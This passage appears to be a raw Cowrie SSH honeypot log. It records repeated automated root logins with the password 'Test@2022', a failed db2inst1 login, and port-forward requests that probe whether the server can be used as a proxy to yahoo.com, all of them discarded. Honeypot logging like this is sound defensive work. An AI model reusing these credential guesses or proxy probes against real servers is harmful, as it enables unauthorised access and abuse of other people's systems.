{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35252,"dst_ip":"1.2.3.4","dst_port":22,"session":"29b39fd8b0d1","protocol":"ssh","message":"New connection: 213.209.150.239:35252 (1.2.3.4:22) [session: 29b39fd8b0d1]","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.991302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.992062Z","src_ip":"213.209.150.239","session":"29b39fd8b0d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.039748Z","src_ip":"213.209.150.239","session":"29b39fd8b0d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.275342Z","src_ip":"213.209.150.239","session":"29b39fd8b0d1"}
{"eventid":"cowrie.login.failed","username":"db2inst1","password":"db2inst1","message":"login attempt [db2inst1/db2inst1] failed","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.312645Z","src_ip":"27.112.78.170","session":"d575ba220890"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":1793,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1793","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.323531Z","session":"29b39fd8b0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.370886Z","src_ip":"213.209.150.239","session":"29b39fd8b0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":754,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:754","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.505478Z","session":"29b39fd8b0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.552747Z","src_ip":"213.209.150.239","session":"29b39fd8b0d1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.600760Z","src_ip":"213.209.150.239","session":"29b39fd8b0d1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35293,"dst_ip":"1.2.3.4","dst_port":22,"session":"5013dddf2ff4","protocol":"ssh","message":"New connection: 213.209.150.239:35293 (1.2.3.4:22) [session: 5013dddf2ff4]","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.656435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.657313Z","src_ip":"213.209.150.239","session":"5013dddf2ff4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.713935Z","src_ip":"213.209.150.239","session":"5013dddf2ff4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:12.996168Z","src_ip":"213.209.150.239","session":"5013dddf2ff4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":7808,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7808","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.053824Z","session":"5013dddf2ff4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.111452Z","src_ip":"213.209.150.239","session":"5013dddf2ff4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":11229,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11229","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.267048Z","session":"5013dddf2ff4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.323610Z","src_ip":"213.209.150.239","session":"5013dddf2ff4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.380943Z","src_ip":"213.209.150.239","session":"5013dddf2ff4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35339,"dst_ip":"1.2.3.4","dst_port":22,"session":"a882a4803d30","protocol":"ssh","message":"New connection: 213.209.150.239:35339 (1.2.3.4:22) [session: a882a4803d30]","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.436492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.437481Z","src_ip":"213.209.150.239","session":"a882a4803d30"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.494180Z","src_ip":"213.209.150.239","session":"a882a4803d30"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.589889Z","src_ip":"27.112.78.170","session":"d575ba220890"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.776300Z","src_ip":"213.209.150.239","session":"a882a4803d30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":23808,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23808","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.834004Z","session":"a882a4803d30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:13.890954Z","src_ip":"213.209.150.239","session":"a882a4803d30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":21347,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21347","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.047141Z","session":"a882a4803d30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.103918Z","src_ip":"213.209.150.239","session":"a882a4803d30"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.161430Z","src_ip":"213.209.150.239","session":"a882a4803d30"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35400,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c2ee69d8fcc","protocol":"ssh","message":"New connection: 213.209.150.239:35400 (1.2.3.4:22) [session: 7c2ee69d8fcc]","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.217174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.218218Z","src_ip":"213.209.150.239","session":"7c2ee69d8fcc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.274970Z","src_ip":"213.209.150.239","session":"7c2ee69d8fcc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.556872Z","src_ip":"213.209.150.239","session":"7c2ee69d8fcc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":15044,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15044","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.614157Z","session":"7c2ee69d8fcc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.670878Z","src_ip":"213.209.150.239","session":"7c2ee69d8fcc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":12020,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:12020","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.826928Z","session":"7c2ee69d8fcc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.883621Z","src_ip":"213.209.150.239","session":"7c2ee69d8fcc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.941430Z","src_ip":"213.209.150.239","session":"7c2ee69d8fcc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35443,"dst_ip":"1.2.3.4","dst_port":22,"session":"e67b1d9b5e30","protocol":"ssh","message":"New connection: 213.209.150.239:35443 (1.2.3.4:22) [session: e67b1d9b5e30]","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.996869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:14.997720Z","src_ip":"213.209.150.239","session":"e67b1d9b5e30"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.054351Z","src_ip":"213.209.150.239","session":"e67b1d9b5e30"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.335901Z","src_ip":"213.209.150.239","session":"e67b1d9b5e30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":27882,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:27882","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.393310Z","session":"e67b1d9b5e30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.449984Z","src_ip":"213.209.150.239","session":"e67b1d9b5e30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":4544,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4544","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.607055Z","session":"e67b1d9b5e30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.663701Z","src_ip":"213.209.150.239","session":"e67b1d9b5e30"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.720991Z","src_ip":"213.209.150.239","session":"e67b1d9b5e30"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35493,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac76c157b1e6","protocol":"ssh","message":"New connection: 213.209.150.239:35493 (1.2.3.4:22) [session: ac76c157b1e6]","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.776580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:15.777460Z","src_ip":"213.209.150.239","session":"ac76c157b1e6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa